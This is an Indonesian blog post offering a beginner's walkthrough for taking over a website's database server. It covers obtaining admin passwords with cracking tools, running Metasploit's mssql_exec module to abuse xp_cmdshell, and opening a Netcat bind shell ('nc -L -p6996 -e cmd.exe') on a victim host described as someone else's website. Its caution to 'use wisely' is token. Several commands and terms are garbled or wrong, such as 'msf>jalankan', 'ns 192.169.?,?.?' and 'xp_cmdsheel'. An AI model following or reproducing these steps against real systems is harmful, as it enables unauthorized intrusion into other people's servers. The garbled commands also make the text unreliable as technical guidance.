Cara Hack Database Website dengan CMD 2021

Cara Hack Database Website dengan CMD
Cara Hack Database Website dengan CMD - Hacking merupakan suatu tindakan kriminal yang digunakan untuk meretas suatu sistem, seperti keamanan layanan online dan website menggunakan trik.

Saat ini sudah ada beragam cara yang bisa lakukan untuk meretas suatu website berbasis data, dan sebagai besar cara tersebut menggunakan metode injeksi SQL.

Injeksi SQL merupakan caraa untuk mengirim perintah SQL kembali kepada database dari formulir suatu website.


Unruk meretas atau dalam istilah hackernya yaitu Deface Website yang dapat dilakukan dengan injeksi SQL agar mendapat akses server yang mendukungnya.

Hampir semua database komersial tersebut memiliki prosedur yang tersimpan dalam sistem, dan hal ini merupakan kode yang disediakan oleh sang developer.

Tentu saja dengan tujuan untuk membantu administrator sistem dalam menyelesaikan tugas-tugas umum.


Pembahasan Cara Hack Database Website dengan CMD

Untuk dapat mengaktifkan SP dari jauh, maka anda membutuhkan kredensial login melalui admin sistem sebuah website yanga akan di hack.

Dan untuk melakukannya anda bisa menggunakan alat seperti SQL dict atau modul bantu metasploit sendiri agar lebih mudah mendapatkan password dari website yang akan diretas.

Jika anda ingin menjalankan perintah pada CMD untuk sistem korban, maka anda tidak bisa hanya dengan menjalankan pengintaian saja.


Melainkan anda juga harus memilikinya dengan pengetahuan dan ilmu mengenai sistem perintah pada windows.

Untuk menghack sebuah website yang anda targetkan, maka anda membutuhkan sebuah perangkat baik dengan komputer maupun laptop yang akan dimanfaatkan sebagai tool CMD atau command prompt.

Selain itu anda juga bisa menggunakan cara berikut ini yang tergolong mudah, karena tidak membutuhkan coding atau bahasa pemrograman yang cukup rumit.

Berikut ini akan kami uraikan beberapa cara hack database website dengan CMD yang mudah dan bisa untuk pemula.


Cara Hack Database Website dengan CMD


1. Cara Hack Database Website dengan CMD Untuk Pemula

Cara Hack Database Website dengan CMD
Cara Hack Database Website dengan CMD Untuk Pemula
Berikut cara hack database website dengan CMD:
  • Langkah pertama yang harus anda lakukan untuk mertas sebuah website yaitu dengan menjalankan tool CMD atau aplikasi terminal.
  • Selanjutnya, anda bisa mulai konsol metasploit dengan menuliskan kode berikut ini: kali>msfconsole
  • Sekarang anda bisa mulai membuat "Modul Auxiliary" dengan membuat modul tambahan "msql_exec" msf>info"

Dengan begitu maka sekarang anda sudah memiliki beberapa variabel kunci yang harus ditetapkan termasuk juga CMD, RHOST, dan Password.

Selain itu anda juga bisa mengatur RHOST di IP server database, password untuk kata sandi akun yang diretas sebelumnya.

Dan untuk perintah harus dijalankan pada sheel perintah diserver yaitu "dir" untuk mendapatkan daftar direktory.


Anda juga harus memastikan bahwa anda menulis perintahnya dengan benar yaitu diantara tanda kutip tunggal.

Jika anda sudah menetapkan variabel-variabel tersebut, maka langkah yang selanjutnya yaitu dengan mengetik "run" dengan perintah berikut "msf>jalankan"

Nantinya modul tersebut secara otomatis akan mengakses prosedur yang tersimpan di "xp_cmdsheel", meskipun telah di nonaktifkan namun tetap bisa untuk mengembalikan hasil perintah.

Langkah yang selanjutnya yaitu dengan mengirimkan perintah tunggal dengan baik, dan pastikan bahwa tidak boleh banyak tindakan yang bisa anda lakukan.

Untuk cara hack database website dengan CMD, anda hanya cukup dengan menggunakan satu perintah saja, dengan pengecualian penghapusan file atau delete.

Oleh karena itu, anda hanya bisa mengirimkan perintah dengan menaruh "&" diantara perintah "msf>set CMD 'cd/ & dir'.

Kemudian anda bisa menjalankan aplikasi secara tersembunyi, anda mungkin sudah memperhatikannya bahwa admin sitem server memiliki Netcat yang bisa dijalankan ke direktory root.

Terkadang mereka meninggalkannya disana untuk administrasi jarak jauh, ataupun untuk tugas yang lain.

Setelah itu baru anda bisa menjalankan perintah berikut ini "msf > set CMD 'cd / & nc -L -p6996 -e cmd.exe'"

Nantinya perintah tersebut akan mengubah direktori ke direktori root tempat Netcat tinggal, lalu bukalah pendengaran Netcat pada port 6996 dan tekan sheel pada perintah.


Sekarang anda bisa mencoba untuk memastikan apakah sudah terhubung pada Netcat atau belum dengan perintah berikut "msf > ns 192.169.?,?.? 6996"

Selesai, sekarang anda sudah berhasil untuk menghack database website milik orang lain menggunakan CMD.

Perlu anda ketahui bahwa anda harus menggunakan cara diatas dengan sangat bijak, dan jangan sampai merugikan pihak lain.

Anda bisa menggunakan cara diatas untuk kegiatan yang berbau positif seperti untuk pembelajaran agar lebih waspada terhadap peretasan yang mungkin bisa terjadi kapan saja.

Intinya adalah anda harus menggunakan cara hack website dengan CMD di atas dengan sangat bijak agar bisa bermanfaat bagi anda banyak orang.



Akhir Kata

Nah, itulah informasi mengenai cara hack website menggunakan CMD yang ampun dan bisa anda gunakan untuk kegiatan positif.

Cara ini cukup sering digunakan oleh para hacker, karena tingkat keberhasilan yang diberikannya cukup tinggi.

Namun perlu anda ketahui juga, bahwa cara tersebut sangat sensitif, jika anda melakukan sedikit kesalahan saja, maka caranya dipastikan gagal, dan harus mengulang dari awal.

Jangan lewatkan artikel kami yang lainnya tentang cara hack cctv dengan cmd, cara hack website dengan android, script CMD hack, kode cmd hack lampu dan perintah CMD untuk hack.

Ada juga tentang cara hack website php, cara hack website tanpa software dan CMD hacker mode.

Itulah keseluruhan bahasan kita pada artikel kali ini mengenai cara hack Database Website dengan CMD 2021. Semoga bermanfaat dan selamat mencoba.
Dody S. Seseorang yang senang belajar dan sharing segala hal tentang teknologi.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel